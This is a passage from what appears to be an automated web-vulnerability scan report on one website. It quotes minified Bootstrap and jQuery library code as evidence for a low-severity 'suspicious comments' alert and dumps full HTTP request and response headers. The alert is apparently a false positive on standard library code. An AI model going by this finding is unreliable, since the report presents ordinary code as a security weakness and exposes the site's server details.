e&&(e.nodeType||e.jquery)?n?p(e).parent().is(t)||t.empty().append(e):t.text(p(e).text()):t[n?"html":"text"](e)},t.getTitle=function(){var t=this.element.getAttribute("data-original-title");return t||(t="function"==typeof this.config.title?this.config.title.call(this.element):this.config.title),t},t._getContainer=function(){return!1===this.config.container?document.body:m.isElement(this.config.container)?p(this.config.container):p(document).find(this.config.container)},t._getAttachment=function(t){return wn[t.toUpperCase()]},t._setListeners=function(){var i=this;this.config.trigger.split(" ").forEach(function(t){if("click"===t)p(i.element).on(i.constructor.Event.CLICK,i.config.selector,function(t){return i.toggle(t)});else if(t!==xn){var e=t===kn?i.constructor.Event.MOUSEENTER:i.constructor.Event.FOCUSIN,n=t===kn?i.constructor.Event.MOUSELEAVE:i.constructor.Event.FOCUSOUT;p(i.element).on(e,i.config.selector,function(t){return i._enter(t)}).on(n,i.config.selector,function(t){return i._leave(t)})}}),p(this.element).closest(".modal").on("hide.bs.modal",function(){i.element&&i.hide()}),this.config.selector?this.config=l({},this.config,{trigger:"manual",selector:""}):this._fixTitle()},t._fixTitle=function(){var t=typeof this.element.getAttribute("data-original-title");(this.element.getAttribute("title")||"string"!==t)&&(this.element.setAttribute("data-original-title",this.element.getAttribute("title")||""),this.element.setAttribute("title",""))},t._enter=function(t,e){var n=this.constructor.DATA_KEY;(e=e||p(t.currentTarget).data(n))||(e=new this.constructor(t.currentTarget,this._getDelegateConfig()),p(t.currentTarget).data(n,e)),t&&(e._activeTrigger["focusin"===t.type?Ln:kn]=!0),p(e.getTipElement()).hasClass(An)||e._hoverState===Cn?e._hoverState=Cn:(clearTimeout(e._timeout),e._hoverState=Cn,e.config.delay&&e.config.delay.show?e._timeout=setTimeout(function(){e._hoverState===Cn&&e.show()},e.config.delay.show):e.show())},t._leave=function(t,e){var n=this.constructor.DATA_KEY;(e=e||p(t.currentTarget).data(n))||(e=new this.constructor(t.currentTarget,this._getDelegateConfig()),p(t.currentTarget).data(n,e)),t&&(e._activeTrigger["focusout"===t.type?Ln:kn]=!1),e._isWithActiveTrigger()||(clearTimeout(e._timeout),e._hoverState=Sn,e.config.delay&&e.config.delay.hide?e._timeout=setTimeout(function(){e._hoverState===Sn&&e.hide()},e.config.delay.hide):e.hide())},t._isWithActiveTrigger=function(){for(var t in this._activeTrigger)if(this._activeTrigger[t])return!0;return!1},t._getConfig=function(t){return"number"==typeof(t=l({},this.constructor.Default,p(this.element).data(),"object"==typeof t&&t?t:{})).delay&&(t.delay={show:t.delay,hide:t.delay}),"number"==typeof t.title&&(t.title=t.title.toString()),"number"==typeof t.content&&(t.content=t.content.toString()),m.typeCheckConfig(mn,t,this.constructor.DefaultType),t},t._getDelegateConfig=function(){var t={};if(this.config)for(var e in this.config)this.constructor.Default[e]!==this.config[e]&&(t[e]=this.config[e]);return t},t._cleanTipClass=function(){var t=p(this.getTipElement()),e=t.attr("class").match(En);null!==e&&e.length&&t.removeClass(e.join(""))},t._handlePopperPlacementChange=function(t){var e=t.instance;this.tip=e.popper,this._cleanTipClass(),this.addAttachmentClass(this._getAttachment(t.placement))},t._fixTransition=function(){var t=this.getTipElement(),e=this.config.animation;null===t.getAttribute("x-placement")&&(p(t).removeClass(In),this.config.animation=!1,this.hide(),this.show(),this.config.animation=e)},i._jQueryInterface=function(n){return this.each(function(){var t=p(this).data(gn),e="object"==typeof n&&n;if((t||!/dispose|hide/.test(n))&&(t||(t=new i(this,e),p(this).data(gn,t)),"string"==typeof n)){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return Tn}},{key:"NAME",get:function(){return mn}},{key:"DATA_KEY",get:function(){return gn}},{key:"Event",get:function(){return Dn}},{key:"EVENT_KEY",get:function(){return _n}},{key:"DefaultType",get:function(){return bn}}]),i}();p.fn[mn]=Hn._jQueryInterface,p.fn[mn].Constructor=Hn,p.fn[mn].noConflict=function(){return p.fn[mn]=vn,Hn._jQueryInterface};var jn="popover",Rn="bs.popover",Fn="."+Rn,Mn=p.fn[jn],Wn="bs-popover",Un=new RegExp("(^|\\s)"+Wn+"\\S+","g"),Bn=l({},Hn.Default,{placement:"right",trigger:"click",content:"",template:'<div class="popover" role="tooltip"><div class="arrow"></div><h3 class="popover-header"></h3><div class="popover-body"></div></div>'}),qn=l({},Hn.DefaultType,{content:"(string|element|function)"}),Kn="fade",Qn="show",Yn=".popover-header",Vn=".popover-body",Xn={HIDE:"hide"+Fn,HIDDEN:"hidden"+Fn,SHOW:"show"+Fn,SHOWN:"shown"+Fn,INSERTED:"inserted"+Fn,CLICK:"click"+Fn,FOCUSIN:"focusin"+Fn,FOCUSOUT:"focusout"+Fn,MOUSEENTER:"mouseenter"+Fn,MOUSELEAVE:"mouseleave"+Fn},zn=function(t){var e,n;function i(){return t.apply(this,arguments)||this}n=t,(e=i).prototype=Object.create(n.prototype),(e.prototype.constructor=e).__proto__=n;var o=i.prototype;return o.isWithContent=function(){return this.getTitle()||this._getContent()},o.addAttachmentClass=function(t){p(this.getTipElement()).addClass(Wn+"-"+t)},o.getTipElement=function(){return this.tip=this.tip||p(this.config.template)[0],this.tip},o.setContent=function(){var t=p(this.getTipElement());this.setElementContent(t.find(Yn),this.getTitle());var e=this._getContent();"function"==typeof e&&(e=e.call(this.element)),this.setElementContent(t.find(Vn),e),t.removeClass(Kn+" "+Qn)},o._getContent=function(){return this.element.getAttribute("data-content")||this.config.content},o._cleanTipClass=function(){var t=p(this.getTipElement()),e=t.attr("class").match(Un);null!==e&&0<e.length&&t.removeClass(e.join(""))},i._jQueryInterface=function(n){return this.each(function(){var t=p(this).data(Rn),e="object"==typeof n?n:null;if((t||!/dispose|hide/.test(n))&&(t||(t=new i(this,e),p(this).data(Rn,t)),"string"==typeof n)){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return Bn}},{key:"NAME",get:function(){return jn}},{key:"DATA_KEY",get:function(){return Rn}},{key:"Event",get:function(){return Xn}},{key:"EVENT_KEY",get:function(){return Fn}},{key:"DefaultType",get:function(){return qn}}]),i}(Hn);p.fn[jn]=zn._jQueryInterface,p.fn[jn].Constructor=zn,p.fn[jn].noConflict=function(){return p.fn[jn]=Mn,zn._jQueryInterface};var Gn="scrollspy",Jn="bs.scrollspy",Zn="."+Jn,$n=p.fn[Gn],ti={offset:10,method:"auto",target:""},ei={offset:"number",method:"string",target:"(string|element)"},ni={ACTIVATE:"activate"+Zn,SCROLL:"scroll"+Zn,LOAD_DATA_API:"load"+Zn+".data-api"},ii="dropdown-item",oi="active",ri='[data-spy="scroll"]',si=".nav, .list-group",ai=".nav-link",li=".nav-item",ci=".list-group-item",hi=".dropdown",ui=".dropdown-item",fi=".dropdown-toggle",di="offset",pi="position",mi=function(){function n(t,e){var n=this;this._element=t,this._scrollElement="BODY"===t.tagName?window:t,this._config=this._getConfig(e),this._selector=this._config.target+" "+ai+","+this._config.target+" "+ci+","+this._config.target+" "+ui,this._offsets=[],this._targets=[],this._activeTarget=null,this._scrollHeight=0,p(this._scrollElement).on(ni.SCROLL,function(t){return n._process(t)}),this.refresh(),this._process()}var t=n.prototype;return t.refresh=function(){var e=this,t=this._scrollElement===this._scrollElement.window?di:pi,o="auto"===this._config.method?t:this._config.method,r=o===pi?this._getScrollTop():0;this._offsets=[],this._targets=[],this._scrollHeight=this._getScrollHeight(),[].slice.call(document.querySelectorAll(this._selector)).map(function(t){var e,n=m.getSelectorFromElement(t);if(n&&(e=document.querySelector(n)),e){var i=e.getBoundingClientRect();if(i.width||i.height)return[p(e)[o]().top+r,n]}return null}).filter(function(t){return t}).sort(function(t,e){return t[0]-e[0]}).forEach(function(t){e._offsets.push(t[0]),e._targets.push(t[1])})},t.dispose=function(){p.removeData(this._element,Jn),p(this._scrollElement).off(Zn),this._element=null,this._scrollElement=null,this._config=null,this._selector=null,this._offsets=null,this._targets=null,this._activeTarget=null,this._scrollHeight=null},t._getConfig=function(t){if("string"!=typeof(t=l({},ti,"object"==typeof t&&t?t:{})).target){var e=p(t.target).attr("id");e||(e=m.getUID(Gn),p(t.target).attr("id",e)),t.target="#"+e}return m.typeCheckConfig(Gn,t,ei),t},t._getScrollTop=function(){return this._scrollElement===window?this._scrollElement.pageYOffset:this._scrollElement.scrollTop},t._getScrollHeight=function(){return this._scrollElement.scrollHeight||Math.max(document.body.scrollHeight,document.documentElement.scrollHeight)},t._getOffsetHeight=function(){return this._scrollElement===window?window.innerHeight:this._scrollElement.getBoundingClientRect().height},t._process=function(){var t=this._getScrollTop()+this._config.offset,e=this._getScrollHeight(),n=this._config.offset+e-this._getOffsetHeight();if(this._scrollHeight!==e&&this.refresh(),n<=t){var i=this._targets[this._targets.length-1];this._activeTarget!==i&&this._activate(i)}else{if(this._activeTarget&&t<this._offsets[0]&&0<this._offsets[0])return this._activeTarget=null,void this._clear();for(var o=this._offsets.length;o--;){this._activeTarget!==this._targets[o]&&t>=this._offsets[o]&&("undefined"==typeof this._offsets[o+1]||t<this._offsets[o+1])&&this._activate(this._targets[o])}}},t._activate=function(e){this._activeTarget=e,this._clear();var t=this._selector.split(",").map(function(t){return t+'[data-target="'+e+'"],'+t+'[href="'+e+'"]'}),n=p([].slice.call(document.querySelectorAll(t.join(","))));n.hasClass(ii)?(n.closest(hi).find(fi).addClass(oi),n.addClass(oi)):(n.addClass(oi),n.parents(si).prev(ai+", "+ci).addClass(oi),n.parents(si).prev(li).children(ai).addClass(oi)),p(this._scrollElement).trigger(ni.ACTIVATE,{relatedTarget:e})},t._clear=function(){[].slice.call(document.querySelectorAll(this._selector)).filter(function(t){return t.classList.contains(oi)}).forEach(function(t){return t.classList.remove(oi)})},n._jQueryInterface=function(e){return this.each(function(){var t=p(this).data(Jn);if(t||(t=new n(this,"object"==typeof e&&e),p(this).data(Jn,t)),"string"==typeof e){if("undefined"==typeof t[e])throw new TypeError('No method named "'+e+'"');t[e]()}})},s(n,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return ti}}]),n}();p(window).on(ni.LOAD_DATA_API,function(){for(var t=[].slice.call(document.querySelectorAll(ri)),e=t.length;e--;){var n=p(t[e]);mi._jQueryInterface.call(n,n.data())}}),p.fn[Gn]=mi._jQueryInterface,p.fn[Gn].Constructor=mi,p.fn[Gn].noConflict=function(){return p.fn[Gn]=$n,mi._jQueryInterface};var gi="bs.tab",_i="."+gi,vi=p.fn.tab,yi={HIDE:"hide"+_i,HIDDEN:"hidden"+_i,SHOW:"show"+_i,SHOWN:"shown"+_i,CLICK_DATA_API:"click"+_i+".data-api"},Ei="dropdown-menu",bi="active",wi="disabled",Ti="fade",Ci="show",Si=".dropdown",Di=".nav, .list-group",Ii=".active",Ai="> li > .active",Oi='[data-toggle="tab"], [data-toggle="pill"], [data-toggle="list"]',Ni=".dropdown-toggle",ki="> .dropdown-menu .active",Li=function(){function i(t){this._element=t}var t=i.prototype;return t.show=function(){var n=this;if(!(this._element.parentNode&&this._element.parentNode.nodeType===Node.ELEMENT_NODE&&p(this._element).hasClass(bi)||p(this._element).hasClass(wi))){var t,i,e=p(this._element).closest(Di)[0],o=m.getSelectorFromElement(this._element);if(e){var r="UL"===e.nodeName||"OL"===e.nodeName?Ai:Ii;i=(i=p.makeArray(p(e).find(r)))[i.length-1]}var s=p.Event(yi.HIDE,{relatedTarget:this._element}),a=p.Event(yi.SHOW,{relatedTarget:i});if(i&&p(i).trigger(s),p(this._element).trigger(a),!a.isDefaultPrevented()&&!s.isDefaultPrevented()){o&&(t=document.querySelector(o)),this._activate(this._element,e);var l=function(){var t=p.Event(yi.HIDDEN,{relatedTarget:n._element}),e=p.Event(yi.SHOWN,{relatedTarget:i});p(i).trigger(t),p(n._element).trigger(e)};t?this._activate(t,t.parentNode,l):l()}}},t.dispose=function(){p.removeData(this._element,gi),this._element=null},t._activate=function(t,e,n){var i=this,o=(!e||"UL"!==e.nodeName&&"OL"!==e.nodeName?p(e).children(Ii):p(e).find(Ai))[0],r=n&&o&&p(o).hasClass(Ti),s=function(){return i._transitionComplete(t,o,n)};if(o&&r){var a=m.getTransitionDurationFromElement(o);p(o).removeClass(Ci).one(m.TRANSITION_END,s).emulateTransitionEnd(a)}else s()},t._transitionComplete=function(t,e,n){if(e){p(e).removeClass(bi);var i=p(e.parentNode).find(ki)[0];i&&p(i).removeClass(bi),"tab"===e.getAttribute("role")&&e.setAttribute("aria-selected",!1)}if(p(t).addClass(bi),"tab"===t.getAttribute("role")&&t.setAttribute("aria-selected",!0),m.reflow(t),p(t).addClass(Ci),t.parentNode&&p(t.parentNode).hasClass(Ei)){var o=p(t).closest(Si)[0];if(o){var r=[].slice.call(o.querySelectorAll(Ni));p(r).addClass(bi)}t.setAttribute("aria-expanded",!0)}n&&n()},i._jQueryInterface=function(n){return this.each(function(){var t=p(this),e=t.data(gi);if(e||(e=new i(this),t.data(gi,e)),"string"==typeof n){if("undefined"==typeof e[n])throw new TypeError('No method named "'+n+'"');e[n]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}}]),i}();p(document).on(yi.CLICK_DATA_API,Oi,function(t){t.preventDefault(),Li._jQueryInterface.call(p(this),"show")}),p.fn.tab=Li._jQueryInterface,p.fn.tab.Constructor=Li,p.fn.tab.noConflict=function(){return p.fn.tab=vi,Li._jQueryInterface};var Pi="toast",xi="bs.toast",Hi="."+xi,ji=p.fn[Pi],Ri={CLICK_DISMISS:"click.dismiss"+Hi,HIDE:"hide"+Hi,HIDDEN:"hidden"+Hi,SHOW:"show"+Hi,SHOWN:"shown"+Hi},Fi="fade",Mi="hide",Wi="show",Ui="showing",Bi={animation:"boolean",autohide:"boolean",delay:"number"},qi={animation:!0,autohide:!0,delay:500},Ki='[data-dismiss="toast"]',Qi=function(){function i(t,e){this._element=t,this._config=this._getConfig(e),this._timeout=null,this._setListeners()}var t=i.prototype;return t.show=function(){var t=this;p(this._element).trigger(Ri.SHOW),this._config.animation&&this._element.classList.add(Fi);var e=function(){t._element.classList.remove(Ui),t._element.classList.add(Wi),p(t._element).trigger(Ri.SHOWN),t._config.autohide&&t.hide()};if(this._element.classList.remove(Mi),this._element.classList.add(Ui),this._config.animation){var n=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,e).emulateTransitionEnd(n)}else e()},t.hide=function(t){var e=this;this._element.classList.contains(Wi)&&(p(this._element).trigger(Ri.HIDE),t?this._close():this._timeout=setTimeout(function(){e._close()},this._config.delay))},t.dispose=function(){clearTimeout(this._timeout),this._timeout=null,this._element.classList.contains(Wi)&&this._element.classList.remove(Wi),p(this._element).off(Ri.CLICK_DISMISS),p.removeData(this._element,xi),this._element=null,this._config=null},t._getConfig=function(t){return t=l({},qi,p(this._element).data(),"object"==typeof t&&t?t:{}),m.typeCheckConfig(Pi,t,this.constructor.DefaultType),t},t._setListeners=function(){var t=this;p(this._element).on(Ri.CLICK_DISMISS,Ki,function(){return t.hide(!0)})},t._close=function(){var t=this,e=function(){t._element.classList.add(Mi),p(t._element).trigger(Ri.HIDDEN)};if(this._element.classList.remove(Wi),this._config.animation){var n=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,e).emulateTransitionEnd(n)}else e()},i._jQueryInterface=function(n){return this.each(function(){var t=p(this),e=t.data(xi);if(e||(e=new i(this,"object"==typeof n&&n),t.data(xi,e)),"string"==typeof n){if("undefined"==typeof e[n])throw new TypeError('No method named "'+n+'"');e[n](this)}})},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"DefaultType",get:function(){return Bi}}]),i}();p.fn[Pi]=Qi._jQueryInterface,p.fn[Pi].Constructor=Qi,p.fn[Pi].noConflict=function(){return p.fn[Pi]=ji,Qi._jQueryInterface},function(){if("undefined"==typeof p)throw new TypeError("Bootstrap's JavaScript requires jQuery. jQuery must be included before Bootstrap's JavaScript.");var t=p.fn.jquery.split(" ")[0].split(".");if(t[0]<2&&t[1]<9||1===t[0]&&9===t[1]&&t[2]<1||4<=t[0])throw new Error("Bootstrap's JavaScript requires at least jQuery v1.9.1 but less than v4.0.0")}(),t.Util=m,t.Alert=g,t.Button=k,t.Carousel=at,t.Collapse=Tt,t.Dropdown=ze,t.Modal=pn,t.Popover=zn,t.Scrollspy=mi,t.Tab=Li,t.Toast=Qi,t.Tooltip=Hn,Object.defineProperty(t,"__esModule",{value:!0})});
          //# sourceMappingURL=bootstrap.bundle.min.js.map
          Evidence
          from
          Solution

          Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.

        4. GET https://beekmans.dev/vendor/jquery/jquery.min.js
          Alert tags
          Alert description

          The response appears to contain suspicious comments which may help an attacker. Note: Matches made within script blocks or files are against the entire content not only comments.

          Other info

          The following pattern was used: \bUSERNAME\b and was detected in the element starting with: "!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(", see evidence field for the suspicious comment/snippet.

          Request
          Request line and header section (269 bytes)
          GET https://beekmans.dev/vendor/jquery/jquery.min.js HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
          Accept: */*
          Accept-Language: en-US,en;q=0.5
          Referer: https://beekmans.dev/
          Connection: keep-alive
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1161 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:18 GMT
          Content-Type: application/javascript; charset=utf-8
          Connection: keep-alive
          last-modified: Fri, 15 Mar 2019 09:41:18 GMT
          etag: W/"1538f-5841ed7427482-gzip"
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bO3KUvuhSkW0NwDvKo9mmn93tbYBJhR24DYcpLQFDAbmDkUzEAXESS1tj005TvZVeZvsve9D3JNKou77mPKmFxMQ%2BOuhW3A7OPTCrdQd4C%2B9kEY4ncKHlY92Wz8fJHY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a4bccae96b2d-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (86927 bytes)
          /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */
          !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==typeof(n=f.call(t,"constructor")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",R="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",I="\\["+M+"*("+R+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+R+"))|)"+M+"*\\]",W=":("+R+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+I+")*)|.*)\\)|)",$=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),F=new RegExp("^"+M+"*,"+M+"*"),_=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),z=new RegExp("="+M+"*([^\\]'\"]*?)"+M+"*\\]","g"),X=new RegExp(W),U=new RegExp("^"+R+"$"),V={ID:new RegExp("^#("+R+")"),CLASS:new RegExp("^\\.("+R+")"),TAG:new RegExp("^("+R+"|[*])"),ATTR:new RegExp("^"+I),PSEUDO:new RegExp("^"+W),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+P+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},G=/^(?:input|select|textarea|button)$/i,Y=/^h\d$/i,Q=/^[^{]+\{\s*\[native \w/,J=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,K=/[+~]/,Z=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),ee=function(e,t,n){var r="0x"+t-65536;return r!==r||n?t:r<0?String.fromCharCode(r+65536):String.fromCharCode(r>>10|55296,1023&r|56320)},te=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ne=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},re=function(){p()},ie=me(function(e){return!0===e.disabled&&("form"in e||"label"in e)},{dir:"parentNode",next:"legend"});try{L.apply(A=H.call(w.childNodes),w.childNodes),A[w.childNodes.length].nodeType}catch(e){L={apply:A.length?function(e,t){q.apply(e,H.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function oe(e,t,r,i){var o,s,l,c,f,h,v,m=t&&t.ownerDocument,T=t?t.nodeType:9;if(r=r||[],"string"!=typeof e||!e||1!==T&&9!==T&&11!==T)return r;if(!i&&((t?t.ownerDocument||t:w)!==d&&p(t),t=t||d,g)){if(11!==T&&(f=J.exec(e)))if(o=f[1]){if(9===T){if(!(l=t.getElementById(o)))return r;if(l.id===o)return r.push(l),r}else if(m&&(l=m.getElementById(o))&&x(t,l)&&l.id===o)return r.push(l),r}else{if(f[2])return L.apply(r,t.getElementsByTagName(e)),r;if((o=f[3])&&n.getElementsByClassName&&t.getElementsByClassName)return L.apply(r,t.getElementsByClassName(o)),r}if(n.qsa&&!S[e+" "]&&(!y||!y.test(e))){if(1!==T)m=t,v=e;else if("object"!==t.nodeName.toLowerCase()){(c=t.getAttribute("id"))?c=c.replace(te,ne):t.setAttribute("id",c=b),s=(h=a(e)).length;while(s--)h[s]="#"+c+" "+ve(h[s]);v=h.join(","),m=K.test(e)&&ge(t.parentNode)||t}if(v)try{return L.apply(r,m.querySelectorAll(v)),r}catch(e){}finally{c===b&&t.removeAttribute("id")}}}return u(e.replace(B,"$1"),t,r,i)}function ae(){var e=[];function t(n,i){return e.push(n+" ")>r.cacheLength&&delete t[e.shift()],t[n+" "]=i}return t}function se(e){return e[b]=!0,e}function ue(e){var t=d.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function le(e,t){var n=e.split("|"),i=n.length;while(i--)r.attrHandle[n[i]]=t}function ce(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&e.sourceIndex-t.sourceIndex;if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function fe(e){return function(t){return"input"===t.nodeName.toLowerCase()&&t.type===e}}function pe(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function de(e){return function(t){return"form"in t?t.parentNode&&!1===t.disabled?"label"in t?"label"in t.parentNode?t.parentNode.disabled===e:t.disabled===e:t.isDisabled===e||t.isDisabled!==!e&&ie(t)===e:t.disabled===e:"label"in t&&t.disabled===e}}function he(e){return se(function(t){return t=+t,se(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}function ge(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}n=oe.support={},o=oe.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return!!t&&"HTML"!==t.nodeName},p=oe.setDocument=function(e){var t,i,a=e?e.ownerDocument||e:w;return a!==d&&9===a.nodeType&&a.documentElement?(d=a,h=d.documentElement,g=!o(d),w!==d&&(i=d.defaultView)&&i.top!==i&&(i.addEventListener?i.addEventListener("unload",re,!1):i.attachEvent&&i.attachEvent("onunload",re)),n.attributes=ue(function(e){return e.className="i",!e.getAttribute("className")}),n.getElementsByTagName=ue(function(e){return e.appendChild(d.createComment("")),!e.getElementsByTagName("*").length}),n.getElementsByClassName=Q.test(d.getElementsByClassName),n.getById=ue(function(e){return h.appendChild(e).id=b,!d.getElementsByName||!d.getElementsByName(b).length}),n.getById?(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){return e.getAttribute("id")===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n=t.getElementById(e);return n?[n]:[]}}):(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){var n="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return n&&n.value===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var 